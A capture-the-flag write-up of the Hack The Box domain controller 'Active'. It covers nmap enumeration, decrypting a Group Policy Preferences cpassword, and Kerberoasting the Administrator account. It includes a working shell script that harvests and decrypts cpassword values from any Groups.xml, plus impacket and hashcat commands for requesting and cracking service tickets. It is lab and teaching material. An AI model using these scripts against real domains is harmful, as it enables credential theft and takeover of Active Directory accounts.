HTB - Active Writeup

Liam Geyer

👾 Machine Overview

This is a writeup of Active, an easy-difficulty Windows machine from HTB. The box is a domain controller, and the path to Administrator chains two classic Active Directory weaknesses: a credential stored in an insecure Group Policy Preferences file, and a privileged account with an SPN that can be Kerberoasted.

Active Thumbnail

🥈 User

🔍 Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC 10.129.230.204                                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-30 08:57 EDT
Nmap scan report for 10.129.230.204
Host is up (0.023s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-30 12:57:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-30T12:58:42
|_ start_date: 2024-05-30T12:54:57

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.01 seconds

SMB

SMB shares on the host could be listed anonymously (null session), and a couple of them stood out:

SMB Shares

Initially we can only read the Replication share, which holds copies of Group Policy objects. Notably there is a Groups.xml file. This file is written by Group Policy Preferences (GPP), an extension of Group Policy that lets administrators push settings such as local user and group changes to domain-joined machines.

GPP

In older deployments the Groups.xml files stored in SYSVOL on Domain Controllers contain an encrypted password attribute called cpassword. These values are encrypted with AES-256, but the key is a fixed value that Microsoft published in the MS-GPPREF specification, so anyone who can read the file can recover the cleartext. The MS14-025 update (May 2014) stopped the Group Policy editor from creating new cpassword entries, but it does not remove entries that already exist in SYSVOL, which is why they still turn up on old domains.

Pillaged Groups.xml:

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="[redacted]" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>

This file contains the encrypted password for the SVC_TGS user. Because the key is public, the cpassword value can be decrypted offline with gpp-decrypt, Metasploit, or a few lines of scripting.
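To show what gpp-decrypt actually does, the following script is an added example (not code from the original writeup): it base64-decodes the cpassword, restores the padding GPP strips, and runs AES-256-CBC with the published MS-GPPREF key and an all-zero IV, then decodes the UTF-16LE plaintext. It also harvests every userName/cpassword pair from a Groups.xml. The built-in demo writes a constructed Groups.xml to a temp file with a locally generated cpassword for the made-up password Summer2018!, so nothing redacted from the box is reproduced; point it at a real file to use it for real.

```shell
#!/bin/sh
# Added example: decrypt Group Policy Preferences cpassword values with openssl.
# The 32-byte AES-256 key below is the one Microsoft published in MS-GPPREF.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_IV=00000000000000000000000000000000   # GPP uses an all-zero IV

# Decrypt one cpassword string (base64 with the '=' padding stripped, as GPP stores it).
gpp_decrypt() {
    cpass=$1
    # GPP strips base64 padding; restore it so base64 -d accepts the string.
    while [ $(( ${#cpass} % 4 )) -ne 0 ]; do cpass="${cpass}="; done
    printf '%s' "$cpass" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | iconv -f UTF-16LE -t UTF-8
}

# Inverse of gpp_decrypt: what a pre-MS14-025 Group Policy editor did when it wrote
# the XML. Used here only to build test data; a patched DC never generates these.
gpp_encrypt() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE \
        | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$GPP_IV" \
        | base64 | tr -d '\n='
}

# Print user:cleartext for every <Properties .../> line in a GPP XML file.
gpp_harvest() {
    grep 'cpassword="' "$1" | while IFS= read -r line; do
        cp=$(printf '%s\n' "$line" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        user=$(printf '%s\n' "$line" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        [ -n "$cp" ] || continue        # cpassword="" means no password was set
        printf '%s:%s\n' "$user" "$(gpp_decrypt "$cp")"
    done
}

# Constructed Groups.xml for the demo: $1 = output path, $2 = cpassword value.
write_sample_groups_xml() {
    cat > "$1" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="$2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>
EOF
}

# Usage: ./gpp.sh <Groups.xml>   (no argument runs the built-in demo)
if [ "$#" -ge 1 ]; then
    gpp_harvest "$1"
else
    tmp=$(mktemp)
    write_sample_groups_xml "$tmp" "$(gpp_encrypt 'Summer2018!')"
    gpp_harvest "$tmp"          # prints active.htb\SVC_TGS:Summer2018!
    rm -f "$tmp"
fi
```

The same key decrypts cpassword values in the other GPP XML files (ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml, Printers.xml), so grep the whole Policies tree rather than stopping at Groups.xml.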

Decrypting the cPassword

🚩 Getting the Flag

Voila, we have credentials for SVC_TGS, which gave us read access to the Users share.

New SMB Permissions

Using smbclient we can download the user flag from the Users share. The credentials do not give a WinRM login, so at this point we have file access but no shell.

🥇 Root

Any authenticated domain user can request a service ticket for an account that has an SPN, and that ticket is encrypted with the service account's password hash. Using impacket-GetUserSPNs as SVC_TGS we find that Administrator has an SPN set, request a ticket for it, and crack the ticket offline with hashcat.

# Kerberoast: list SPN accounts and request a TGS for each (-request), saving hashes in hashcat format
impacket-GetUserSPNs -request -dc-ip [IP] active.htb/SVC_TGS -outputfile kerberoast.hash

# Crack the hash (mode 13100 = Kerberos 5 TGS-REP etype 23, RC4-HMAC)
hashcat -a 0 -m 13100 ./kerberoast.hash /usr/share/wordlists/rockyou.txt
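Mode 13100 is correct only for RC4-HMAC (etype 23) tickets, which is what the box hands out; if the target account has AES-only Kerberos, GetUserSPNs writes an etype 17 or 18 line and hashcat needs mode 19600 or 19700 instead. The helper below is an added example (not part of the original writeup) that reads the impacket output format and reports the account, realm, SPN, etype and matching hashcat mode, so a mixed output file can be split into one hashcat run per mode. The hash lines in the demo are constructed: the checksum and ciphertext fields are placeholder hex, and svc_sql/db.active.htb are made-up names.

```shell
#!/bin/sh
# Added example: pick the hashcat mode from the etype embedded in a Kerberoast hash.
# impacket writes RC4/DES tickets as  $krb5tgs$23$*user$REALM$spn*$checksum$edata
# and AES tickets as                  $krb5tgs$18$user$REALM$*spn*$checksum$edata

# Print: user realm spn etype hashcat_mode
kerberoast_hash_info() {
    printf '%s\n' "$1" | awk -F'[$]' '
        $2 != "krb5tgs" { print "not a krb5tgs hash: " $0 > "/dev/stderr"; exit 1 }
        {
            etype = $3 + 0
            if (etype == 23 || etype == 3) {
                # RC4-HMAC / DES layout: the SPN is wrapped as *user ... spn*
                user = substr($4, 2); realm = $5; spn = substr($6, 1, length($6) - 1)
            } else {
                # AES layout: user and realm are bare, the SPN is wrapped as *spn*
                user = $4; realm = $5; spn = substr($6, 2, length($6) - 2)
            }
            mode = "unsupported"
            if (etype == 23) mode = 13100   # Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
            if (etype == 17) mode = 19600   # etype 17 (AES128-CTS-HMAC-SHA1-96)
            if (etype == 18) mode = 19700   # etype 18 (AES256-CTS-HMAC-SHA1-96)
            print user, realm, spn, etype, mode
        }'
}

# Unique hashcat modes needed for an impacket -outputfile (one hashcat run per mode).
kerberoast_modes() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        kerberoast_hash_info "$line" | awk '{ print $5 }'
    done < "$1" | sort -u
}

# Demo on two constructed hash lines (placeholder hex, made-up SPN for the AES case).
demo_file=$(mktemp)
cat > "$demo_file" <<'EOF'
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$00112233445566778899aabbccddeeff$0123456789abcdef
$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/db.active.htb~1433*$00112233445566778899aabb$0123456789abcdef
EOF
while IFS= read -r h; do kerberoast_hash_info "$h"; done < "$demo_file"
kerberoast_modes "$demo_file"      # prints 13100 and 19700, one per line
rm -f "$demo_file"
```

hashcat accepts only one mode per invocation and skips lines that do not parse for that mode, so a file that mixes etypes silently loses hashes unless it is split this way.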

From there the cracked Administrator password can be used to log in, for example with impacket-psexec for a SYSTEM shell or smbclient against the C$ share, and read the root flag.

📖 Resources

  • Cybersec Notes: Kerberoasting Notes
  • MindPoint: GPP PrivEsc
  • Title: HTB - Active Writeup
  • Author: Liam Geyer
  • Created at : 2024-06-01 00:00:00
  • Updated at : 2024-09-10 21:05:23
  • Link: https://lfgberg.org/2024/06/01/htb/active/
  • License: This work is licensed under CC BY-NC-SA 4.0.